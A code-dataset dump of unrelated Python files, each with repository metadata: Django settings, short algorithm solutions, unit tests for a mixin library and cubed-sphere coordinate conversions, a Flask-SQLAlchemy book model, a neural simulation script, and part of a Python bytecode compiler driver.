b542e098a92e72342cb38640aacc06125c27de7f | 998610ed0b370c5beb73d908164d07f6f9a692ab | /tachovendo_proj/settings/base.py | 2eeb26e276275d69531b6b692436f73ad4a6f279 | [] | no_license | loogica/tachovendo_backend | d372f0032cc5ab02883c433cc2ed36467adf85c9 | 4333a55716df31897eeecb84ffa019456336e010 | refs/heads/master | 2016-09-06T08:06:07.003269 | 2013-06-04T01:03:36 | 2013-06-04T01:03:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,111 | py | # coding: utf-8
"""Common settings and globals."""
import os
from os.path import abspath, basename, dirname, join, normpath
from sys import argv, path
from unipath import Path
########## PATH CONFIGURATION
# Absolute filesystem path to the Django project directory:
DJANGO_ROOT = dirname(dirname(abspath(__file__)))
PROJECT_ROOT = Path(__file__).ancestor(3)
# Absolute filesystem path to the top-level project folder:
SITE_ROOT = dirname(DJANGO_ROOT)
# Site name:
SITE_NAME = basename(DJANGO_ROOT)
# Add our project to our pythonpath, this way we don't need to type our project
# name in our dotted import paths:
path.append(DJANGO_ROOT)
########## END PATH CONFIGURATION
########## DEBUG CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = False
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG CONFIGURATION
########## MANAGER CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
('you', '[email protected]'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
########## END MANAGER CONFIGURATION
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': '',
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
}
}
########## END DATABASE CONFIGURATION
########## GENERAL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone
TIME_ZONE = 'America/Sao_Paulo'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'pt-br'
gettext = lambda s: s
LANGUAGES = (
('pt', gettext('Português')),
('en', gettext('English')),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
LOCALE_PATHS = normpath(join(DJANGO_ROOT, 'locale'))
########## END GENERAL CONFIGURATION
########## MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = normpath(join(DJANGO_ROOT, 'media'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
########## END MEDIA CONFIGURATION
########## STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = normpath(join(DJANGO_ROOT, 'assets'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
normpath(join(DJANGO_ROOT, 'static')),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
########## END STATIC FILE CONFIGURATION
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = r"$&jkf@shv+tec-uz_t5qz0u7nxrp%2b4v!9ym3rqd!=mmy-7+*"
########## END SECRET CONFIGURATION
########## FIXTURE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
normpath(join(SITE_ROOT, 'fixtures')),
)
########## END FIXTURE CONFIGURATION
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_DIRS = (
normpath(join(DJANGO_ROOT, 'templates')),
)
########## END TEMPLATE CONFIGURATION
########## MIDDLEWARE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#middleware-classes
MIDDLEWARE_CLASSES = (
# Default Django middleware.
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
########## END MIDDLEWARE CONFIGURATION
########## URL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#root-urlconf
ROOT_URLCONF = '%s.urls' % SITE_NAME
########## END URL CONFIGURATION
# Auth views Config
LOGIN_URL = "/login"
LOGIN_REDIRECT_URL = "/"
# End
########## APP CONFIGURATION
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
'django.contrib.admin',
)
THIRD_PARTY_APPS = (
# Database migration helpers:
'south',
'widget_tweaks',
)
# Apps specific for this project go here.
LOCAL_APPS = (
'tachovendo',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
########## END APP CONFIGURATION
########## RIOAPPS KEY CONFIG
APP_ID = os.environ.get('RIOAPPS_APP_ID')
APP_SECRET = os.environ.get('RIOAPPS_APP_SECRET')
########## END RIOAPPS KEYS CONFIG
########## LOGGING CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'django.utils.log.NullHandler',
},
'console':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
'events.views': {
'handlers': ['console'],
'level': 'INFO',
'propagate': True,
},
}
}
########## END LOGGING CONFIGURATION
########## WSGI CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'wsgi.application'
########## END WSGI CONFIGURATION
| [
"[email protected]"
] | |
2b17d640e22b95cc5a61021381c03af14f83aee7 | a30362e51cb3291daf26d0c62e56c42caeec837f | /python/acmicpc/unsolved/8984.py | e9fc6b9f6e862ee51d73a36e02a12d6bc484c6b5 | [] | no_license | TERADA-DANTE/algorithm | 03bf52764c6fcdb93d7c8a0ed7a672834f488412 | 20bdfa1a5a6b9c378e588b17073e77a0126f7339 | refs/heads/master | 2023-04-14T21:40:11.250022 | 2023-04-12T13:00:37 | 2023-04-12T13:00:37 | 288,335,057 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 210 | py | import sys
input = sys.stdin.readline
n, l = list(map(int, input().split()))
lines = [list(map(int, input().split())) for _ in range(n)]
def solution(n, l, lines):
return n, l, lines
print(n, l, lines)
| [
"[email protected]"
] | |
3f14475e0c2863c12b7447c7a82f14ad759b824e | a140fe192fd643ce556fa34bf2f84ddbdb97f091 | /.history/class맴버변수_20200708170750.py | 62351d8c9312e58d87ab4c22a5685c88c76c9c41 | [] | no_license | sangha0719/py-practice | 826f13cb422ef43992a69f822b9f04c2cb6d4815 | 6d71ce64bf91cc3bccee81378577d84ba9d9c121 | refs/heads/master | 2023-03-13T04:40:55.883279 | 2021-02-25T12:02:04 | 2021-02-25T12:02:04 | 342,230,484 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 374 | py | class Unit:
def __init__(self, name, hp, damage):
self.name = name
self.hp = hp
self.damage = damage
print("{0} 유닛이 생성 되었습니다.".format(self.name))
print("체력 {0}, 공격력 {1}".format(self.hp, self.damage))
# 레이스 : 공중 유닛, 비행기, 클로킹 (상대방에게 보이지 않음)
wraith = Unit
| [
"[email protected]"
] | |
76c6674b3a2fb4f35bd3276d78443a663070b14f | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2950/60632/269982.py | e99e3be7a8277b32c3e022c23301da28661ec71a | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 273 | py | s = list(input())
if len(s) % 2 == 1:
print(-1)
else:
result = 0
for i in range(len(s)):
if s[:i].count('5') > s[:i].count('2'):
result = -1
break
result = max(s[:1].count('2')-s[:1].count('5'), result)
print(result)
| [
"[email protected]"
] | |
54a8883bb18ba783ca7d90de1608b104223d1c3f | 30dbb8c5a5cce9dfea904924f00a1451abd0c88b | /이분탐색/입국심사.py | d1b435138bd0d7498ccb48efc79bedafab3961ee | [] | no_license | gksrb2656/AlgoPractice | 7eac983509de4c5f047a880902253e477f4ca27c | 5285479625429b8ef46888c8611dc132924833b7 | refs/heads/master | 2020-12-22T17:20:33.677147 | 2020-09-22T16:05:53 | 2020-09-22T16:05:53 | 236,872,750 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 428 | py | def solution(n, times):
l = 1
r = max(times)*n
answer = 0
while l <= r:
mid = (l + r) // 2
flag = 0
people = 0
for t in times:
people += mid // t
if people >= n:
flag = 1
answer = mid
break
if flag:
r = mid - 1
else:
l = mid + 1
return answer
solution(6, [7, 10]) | [
"[email protected]"
] | |
149a39da8051edd413bd0e53d557532e042ebf01 | fc6f0806292263bbfb2055587468df68ab6a950e | /tests/test_mixins.py | dad5938477e9c873a7c71c6b6f343aff1a6fd7b9 | [
"Apache-2.0"
] | permissive | WithPrecedent/sourdough | 8c0a5cff14c2257162fd1d66bf03a5a53f6a9571 | e42f81e5b27b067e13ff17338300e56c23ae4cad | refs/heads/master | 2023-03-03T16:23:10.857530 | 2021-02-10T04:49:57 | 2021-02-10T04:49:57 | 261,512,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,898 | py | """
test_mixins: unit tests for Component mixins
Corey Rayburn Yung <[email protected]>
Copyright 2020-2021, Corey Rayburn Yung
License: Apache-2.0 (https://www.apache.org/licenses/LICENSE-2.0)
"""
import dataclasses
import sourdough
@dataclasses.dataclass
class AComponent(
sourdough.Bunch,
sourdough.Registry,
sourdough.quirks.Element):
pass
@dataclasses.dataclass
class OtherComponent(AComponent):
pass
@dataclasses.dataclass
class AnotherComponent(sourdough.Options, OtherComponent):
options = sourdough.Catalog(contents = {
'base': AComponent(),
'other': OtherComponent()})
@dataclasses.dataclass
class ProxiedComponent(sourdough.Proxy, OtherComponent):
def __post_init__(self):
super().__post_init__()
self._hidden_attribute = 'value'
self.proxify(proxy = 'new_property', attribute = '_hidden_attribute')
def test_mixins():
# Tests Component, Registry, and Bunch
a_component = AComponent()
other_component = OtherComponent()
assert 'other_component' in AComponent.store
assert 'other_component' in a_component.store
assert 'other_component' in AComponent.store
assert 'other_component' in a_component.store
an_instance = a_component.instance(key = 'other_component', name = 'test')
assert an_instance.name == 'test'
another_instance = a_component.borrow(key = 'other_component')
assert another_instance.name == 'other_component'
# Tests Options
another_component = AnotherComponent()
base_instance = another_component.select(key = 'base')
other_instance = another_component.select(key = 'other')
assert other_instance.name == 'other_component'
# Tests Proxy
# proxied_component = ProxiedComponent()
# assert proxied_component.new_property == 'value'
return
if __name__ == '__main__':
test_mixins() | [
"[email protected]"
] | |
20878697ebaf854f56e4a45f312b2032fba93a2c | ef8c5c55b6ec3971adff9afe2db1f76556b87082 | /code_examples/PyKIM/util/convert_coord/test_cart_cs.py | 73f53cd89f0df756db61dc64bfb03fbd2688b823 | [] | no_license | wbkifun/my_stuff | 7007efc94b678234097abf0df9babfbd79dcf0ff | 0b5ad5d4d103fd05989b514bca0d5114691f8ff7 | refs/heads/master | 2020-12-10T22:40:28.532993 | 2017-11-15T11:39:41 | 2017-11-15T11:39:41 | 5,178,225 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,608 | py | import numpy as np
from numpy import pi, sin, cos, tan, sqrt
from numpy.random import rand, randint
from numpy.testing import assert_equal as equal
from numpy.testing import assert_array_equal as a_equal
from numpy.testing import assert_array_almost_equal as aa_equal
from nose.tools import raises, ok_
import sys
from os.path import abspath, dirname
current_dpath = dirname(abspath(__file__))
sys.path.append(current_dpath)
def test_xyp2xyz():
'''
xyp2xyz(): center of panel, at panel border
'''
from cart_cs import xyp2xyz
R = 1
a = R/sqrt(3)
#------------------------------------------------
# center of panel
#------------------------------------------------
x, y, panel = 0, 0, 1
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (1,0,0))
x, y, panel = 0, 0, 2
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0,1,0))
x, y, panel = 0, 0, 3
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (-1,0,0))
x, y, panel = 0, 0, 4
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0,-1,0))
x, y, panel = 0, 0, 5
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0,0,-1))
x, y, panel = 0, 0, 6
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0,0,1))
#------------------------------------------------
# at the panel border
#------------------------------------------------
alpha = pi/4
x, y, panel = a*tan(alpha), 0, 1
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (R*cos(alpha), R*sin(alpha), 0))
x, y, panel = a*tan(alpha), 0, 2
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (-R*sin(alpha), R*cos(alpha), 0))
x, y, panel = 0, -a*tan(alpha), 2
(X, Y, Z) = xyp2xyz(x, y, panel)
aa_equal((X,Y,Z), (0, R*sin(alpha), -R*cos(alpha)), 15)
x, y, panel = a*tan(alpha), 0, 3
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (-R*cos(alpha), -R*sin(alpha), 0))
x, y, panel = a*tan(alpha), 0, 4
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (R*sin(alpha), -R*cos(alpha), 0))
x, y, panel = a*tan(alpha), 0, 5
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0, R*sin(alpha), -R*cos(alpha)))
x, y, panel = a*tan(alpha), 0, 6
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0, R*sin(alpha), R*cos(alpha)))
def test_xyz2xyp():
'''
xyz2xyp(): center of panel, at panel border
'''
from cart_cs import xyz2xyp
R = 1
a = R/sqrt(3)
#------------------------------------------------
# center of panel
#------------------------------------------------
xyp_dict = xyz2xyp(1, 0, 0)
a_equal(xyp_dict, {1:(0.0,0)})
xyp_dict = xyz2xyp(0, 1, 0)
a_equal(xyp_dict, {2:(0,0)})
xyp_dict = xyz2xyp(-1, 0, 0)
a_equal(xyp_dict, {3:(0,0)})
xyp_dict = xyz2xyp(0, -1, 0)
a_equal(xyp_dict, {4:(0,0)})
xyp_dict = xyz2xyp(0, 0, -1)
a_equal(xyp_dict, {5:(0,0)})
xyp_dict = xyz2xyp(0, 0, 1)
a_equal(xyp_dict, {6:(0,0)})
#------------------------------------------------
# at the panel border
#------------------------------------------------
alpha = pi/4
at = a*tan(alpha)
xyp_dict = xyz2xyp(R*cos(alpha), R*sin(alpha), 0)
a_equal(list(xyp_dict.keys()), [1,2])
aa_equal(list(xyp_dict.values()), [(at,0), (-at,0)], 15)
xyp_dict = xyz2xyp(-R*sin(alpha), R*cos(alpha), 0)
a_equal(list(xyp_dict.keys()), [2,3])
aa_equal(list(xyp_dict.values()), [(at,0), (-at,0)], 15)
xyp_dict = xyz2xyp(-R*cos(alpha), -R*sin(alpha), 0)
a_equal(list(xyp_dict.keys()), [3,4])
aa_equal(list(xyp_dict.values()), [(at,0), (-at,0)], 15)
xyp_dict = xyz2xyp(R*sin(alpha), -R*cos(alpha), 0)
a_equal(list(xyp_dict.keys()), [1,4])
aa_equal(list(xyp_dict.values()), [(-at,0), (at,0)], 15)
xyp_dict = xyz2xyp(0, R*sin(alpha), -R*cos(alpha))
a_equal(list(xyp_dict.keys()), [2,5])
aa_equal(list(xyp_dict.values()), [(0,-at), (at,0)], 15)
xyp_dict = xyz2xyp(0, R*sin(alpha), R*cos(alpha))
a_equal(list(xyp_dict.keys()), [2,6])
aa_equal(list(xyp_dict.values()), [(0,at), (at,0)], 15)
def test_xyp2xyz_xyz2xyp():
'''
xyp2xyz() -> xyz2xyp() : check consistency, repeat 1000 times
'''
from cart_cs import xyp2xyz, xyz2xyp
N = 1000
R = 1
a = R/sqrt(3)
for i in range(N):
panel = randint(1,7)
alpha, beta = (pi/2)*rand(2) - pi/4
x, y = a*tan(alpha), a*tan(beta)
(X, Y, Z) = xyp2xyz(x, y, panel)
xyp_dict = xyz2xyp(X,Y,Z)
aa_equal((x,y), xyp_dict[panel], 15)
| [
"[email protected]"
] | |
7ba4723843b10f4bdde50acfefd5f04d1227d875 | 4344f7d6b3c26e8cb9c666ca0a1dc81d5d484fca | /4-auth/bookshelf/model_cloudsql.py | 5ceac779fc83be92f4bf47d5d8bd2c1317916370 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | dpebot/getting-started-python | 5beec5a68738ae47ed4bb642a7f4a119052ee6b6 | 07ce28b40c9be8555cb8575b83d7ba836b6483f2 | refs/heads/master | 2020-12-26T04:38:09.399296 | 2016-08-03T18:16:30 | 2016-08-03T18:16:30 | 65,573,255 | 4 | 3 | null | 2016-08-12T17:59:13 | 2016-08-12T17:59:13 | null | UTF-8 | Python | false | false | 3,043 | py | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
builtin_list = list
db = SQLAlchemy()
def init_app(app):
db.init_app(app)
def from_sql(row):
"""Translates a SQLAlchemy model instance into a dictionary"""
data = row.__dict__.copy()
data['id'] = row.id
data.pop('_sa_instance_state')
return data
class Book(db.Model):
__tablename__ = 'books'
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(255))
author = db.Column(db.String(255))
publishedDate = db.Column(db.String(255))
imageUrl = db.Column(db.String(255))
description = db.Column(db.String(255))
createdBy = db.Column(db.String(255))
createdById = db.Column(db.String(255))
def __repr__(self):
return "<Book(title='%s', author=%s)" % (self.title, self.author)
def list(limit=10, cursor=None):
cursor = int(cursor) if cursor else 0
query = (Book.query
.order_by(Book.title)
.limit(limit)
.offset(cursor))
books = builtin_list(map(from_sql, query.all()))
next_page = cursor + limit if len(books) == limit else None
return (books, next_page)
# [START list_by_user]
def list_by_user(user_id, limit=10, cursor=None):
cursor = int(cursor) if cursor else 0
query = (Book.query
.filter_by(createdById=user_id)
.order_by(Book.title)
.limit(limit)
.offset(cursor))
books = builtin_list(map(from_sql, query.all()))
next_page = cursor + limit if len(books) == limit else None
return (books, next_page)
# [END list_by_user]
def read(id):
result = Book.query.get(id)
if not result:
return None
return from_sql(result)
def create(data):
book = Book(**data)
db.session.add(book)
db.session.commit()
return from_sql(book)
def update(data, id):
book = Book.query.get(id)
for k, v in data.items():
setattr(book, k, v)
db.session.commit()
return from_sql(book)
def delete(id):
Book.query.filter_by(id=id).delete()
db.session.commit()
def _create_database():
"""
If this script is run directly, create all the tables necessary to run the
application.
"""
app = Flask(__name__)
app.config.from_pyfile('../config.py')
init_app(app)
with app.app_context():
db.create_all()
print("All tables created")
if __name__ == '__main__':
_create_database()
| [
"[email protected]"
] | |
4bf42f64d15e50c0c51bbc1ad46db6a070cd95e2 | d5d2ddfb2f6a4d025d0d323d343550d11990674f | /model/scripts/main_mutual_information_MSN.py | d3113bb158c04dbcb81800724706ff0a482a1844 | [] | no_license | mickelindahl/dynsyn | 5d710fa67d31f344c56c3b853b9d78af1f297fbf | c05a74c0f7dd977742ce55220d12270c03147e0f | refs/heads/master | 2021-01-01T05:37:57.452690 | 2015-02-23T10:16:44 | 2015-02-23T10:16:44 | 30,537,438 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,161 | py | import numpy
import pylab
import os
import sys
import time as ttime
# Get directory where model and code resides
model_dir= '/'.join(os.getcwd().split('/')[0:-1])
code_dir= '/'.join(os.getcwd().split('/')[0:-2])
# Add model, code and current directories to python path
sys.path.append(os.getcwd())
sys.path.append(model_dir)
sys.path.append(code_dir+'/nest_toolbox')
from simulation_utils import simulate_MSN
from src import misc
OUTPUT_PATH = os.getcwd()+'/output/' + sys.argv[0].split('/')[-1].split('.')[0]
RUN=True
# 48 minuter 200x10x10
HZS=numpy.linspace(5,50,10)
N_MSNS=numpy.linspace(5,50,10)
t=ttime.time()
save_result_at=OUTPUT_PATH+'/main_mutual_information_raw_data.pkl'
if RUN is False:
count_dic={}
for i_syn, syn in enumerate(['MSN_SNR_gaba_s_min', 'MSN_SNR_gaba_s_mid', 'MSN_SNR_gaba_s_max',
'MSN_SNR_gaba_p1']):
count_dic[i_syn]={}
for hz in numpy.linspace(5,50,10):
count_dic[i_syn][hz]={}
for N_MSN in numpy.linspace(5,50,10):
count_dic[i_syn][hz][N_MSN]=[]
for i in range(200):
c, time= simulate_MSN(int(N_MSN), ['SNR_izh'], [syn],
sim_time=1000, burst_onset=700, burst_offset=1000,
burst_rate=hz, threads=1)
count_dic[i_syn][hz][N_MSN].extend(c)
count_dic[i_syn][hz][N_MSN]=numpy.array(count_dic[i_syn][hz][N_MSN])
misc.pickle_save([count_dic, time],save_result_at)
else:
#count_dic, time= misc.pickle_load(save_result_at)
pass
save_result_at=OUTPUT_PATH+'/main_mutual_information_prob.pkl'
if RUN is False:
c_prob=[]
c_sum=[]
for i in sorted(list(count_dic.keys())):
c_prob.append([])
c_sum.append([])
for j, hz in enumerate(sorted(list(count_dic[i].keys()))):
c_prob[i].append([])
c_sum[i].append([])
for N in sorted(list(count_dic[i][hz].keys())):
c=count_dic[i][hz][N][2::3,:] # Pick out results for SNr
c_conv=misc.convolve(c,bin_extent=100, kernel_type='rectangle')
c_prob[i][j].append(numpy.sum(c_conv<1,axis=0)/float(c_conv.shape[0]))
c_sum[i][j].append(numpy.sum(c,axis=0))
c_prob=numpy.array(c_prob)
c_sum=numpy.array(c_sum)
misc.pickle_save([c_prob, c_sum, time],save_result_at)
else:
c_prob, c_sum, time= misc.pickle_load(save_result_at)
from numpy import *
import pylab as p
#import matplotlib.axes3d as p3
import mpl_toolkits.mplot3d.axes3d as p3
from matplotlib import cm
#ax2=pylab.subplot(111)
for i in range(c_sum.shape[0]):
#
x=[]
y=[]
z=[]
#fig = pylab.figure()
#ax1=pylab.subplot(111)
for j in range(c_sum.shape[1]):
x.append([])
y.append([])
z.append([])
for k in range(c_sum.shape[2]):
x[j].append(HZS[j])
y[j].append(N_MSNS[k])
z[j].append(c_sum[i,j,k,770])
#z[j].append(c_prob[i,j,k,770])
if (i==1) and (j==1) and (k==9):
fig = pylab.figure()
ax=pylab.subplot(111)
ax.plot(time, c_sum[i,j,k,:])
ax.plot(time, misc.convolve(c_sum[i,j,k,:], bin_extent=100, kernel_type='rectangle', single=True).transpose())
pylab.show()
ax.set_xlabel('Spike count')
#ax1.plot(c_sum[i,j,k,:])
#ax1.plot(c_prob[i,j,k,:])
x=numpy.array(x)
y=numpy.array(y)
z=numpy.array(z)
# fig = pylab.figure()
# ax = p3.Axes3D(fig)
# ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet)
# ax.view_init(50, 135)
#
fig = pylab.figure()
ax=pylab.subplot(111)
for k in range(c_sum.shape[1]):
ax.plot(x[:,k],z[:,k])
ax.set_xlabel('Firing rate (spikes/s)')
fig = pylab.figure()
ax=pylab.subplot(111)
for k in range(c_sum.shape[2]):
ax.plot(y[k,:],z[k,:])
ax.set_xlabel('Number of MSNs')
#ax1.pcolor(numpy.array(z))
#pylab.colorbar()
pylab.show()
count=numpy.array(count_dic[1][5][5])
save_result_at=OUTPUT_PATH+'/main_mutual_information_convolved_raw_data.pkl'
if RUN is True:
count_conv=[]
count_conv=misc.convolve(count, bin_extent=10, kernel_type='rectangle')
misc.pickle_save([count_conv],save_result_at)
else:
count_conv= misc.pickle_load(save_result_at)
count=count_conv
save_result_at=OUTPUT_PATH+'/main_mutual_information_count_sr.pkl'
if RUN is True:
data=[]
min_data=[]
max_data=[]
for i in range(3):
data.append(numpy.array(count[i::3,:]))
min_data.append(numpy.floor(numpy.min(count[i::3,:])))
max_data.append(numpy.ceil(numpy.max(count[i::3,:])))
#data[1]=data[0]+data[1]
count_rs_list=[]
print max_data
for k in range(len(time)):
count_rs=numpy.zeros((max_data[1]+1,max_data[2]+1))
nx=range(min_data[1], max_data[1]+2)
ny=range(min_data[2], max_data[2]+2)
count_rs, xedges, yedges = numpy.histogram2d(data[1][:,k], data[2][:,k], bins=(nx, ny))
count_rs_list.append(count_rs)
misc.pickle_save([count_rs_list,data], save_result_at)
else:
count_rs_list, data=misc.pickle_load(save_result_at)
ff=misc.fano_factor(data[2])
a=numpy.ones((2,2))
b=numpy.ones((3,3))
c=numpy.array([[1,2,3],[2,1,3],[3,2,1]])
d=numpy.array([[2,1],[2,2]])
mi_test=misc.mutual_information([d,c, a,b])
mi=misc.mutual_information(count_rs_list)
max_data=[]
for i in range(3):
data.append(numpy.array(count[i::3]))
max_data.append(numpy.max(count[i::3]))
print count_rs_list[0].shape, max_data, len(count_rs_list)
pylab.figure()
pylab.plot(time, ff)
pylab.figure()
for i in range(3):
pylab.subplot(3,1,i+1)
pylab.plot(time, numpy.sum(data[i], axis=0))
print 'Simulation sime', (t-ttime.time()) / 60., 'min'
pylab.show()
| [
"[email protected]"
] | |
7be3f8d94e75750a876f1605eeeddd32844a7051 | 0131d8d133725aed18f0a5838ec49878c0a85cfe | /opy/opy_main.py | 1775be52cabea2892d6e5dc6cf7990c94f7987ef | [
"Apache-2.0"
] | permissive | bysshe/oil | 0d7e853adb2aa8560832eed72daf1284955b5573 | 62cd4928c0e71f9cd254062204227a8d8cf1cb23 | refs/heads/master | 2021-01-19T23:54:01.609581 | 2017-04-17T15:58:29 | 2017-04-17T21:53:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,064 | py | #!/usr/bin/python
"""
opy_main.py
"""
from __future__ import print_function
import cStringIO
import codecs
import io
import os
import sys
import marshal
import logging
# Like oil.py, set PYTHONPATH internally? So symlinks work?
# Actually '.' is implicitly in PYTHONPATH, so we don't need it.
# If we were in bin/oil.py, then we would need this.
#this_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
#sys.path.append(os.path.join(this_dir))
from pgen2 import driver, pgen, grammar
from pgen2 import token, tokenize
import pytree
from compiler2 import transformer
from compiler2 import pycodegen
from compiler2 import opcode
from byterun import execfile
from util_opy import log
# From lib2to3/pygram.py. This takes the place of the 'symbol' module.
# compiler/transformer module needs this.
class Symbols(object):
def __init__(self, gr):
"""Initializer.
Creates an attribute for each grammar symbol (nonterminal),
whose value is the symbol's type (an int >= 256).
"""
for name, symbol in gr.symbol2number.items():
setattr(self, name, symbol)
#log('%s -> %d' % (name, symbol))
# For transformer to use
self.number2symbol = gr.number2symbol
#assert 0
def HostStdlibNames():
import symbol
import token
names = {}
for k, v in symbol.sym_name.items():
names[k] = v
for k, v in token.tok_name.items():
names[k] = v
return names
def _newer(a, b):
"""Inquire whether file a was written since file b."""
if not os.path.exists(a):
return False
if not os.path.exists(b):
return True
return os.path.getmtime(a) >= os.path.getmtime(b)
def _generate_pickle_name(gt):
head, tail = os.path.splitext(gt)
if tail == ".txt":
tail = ""
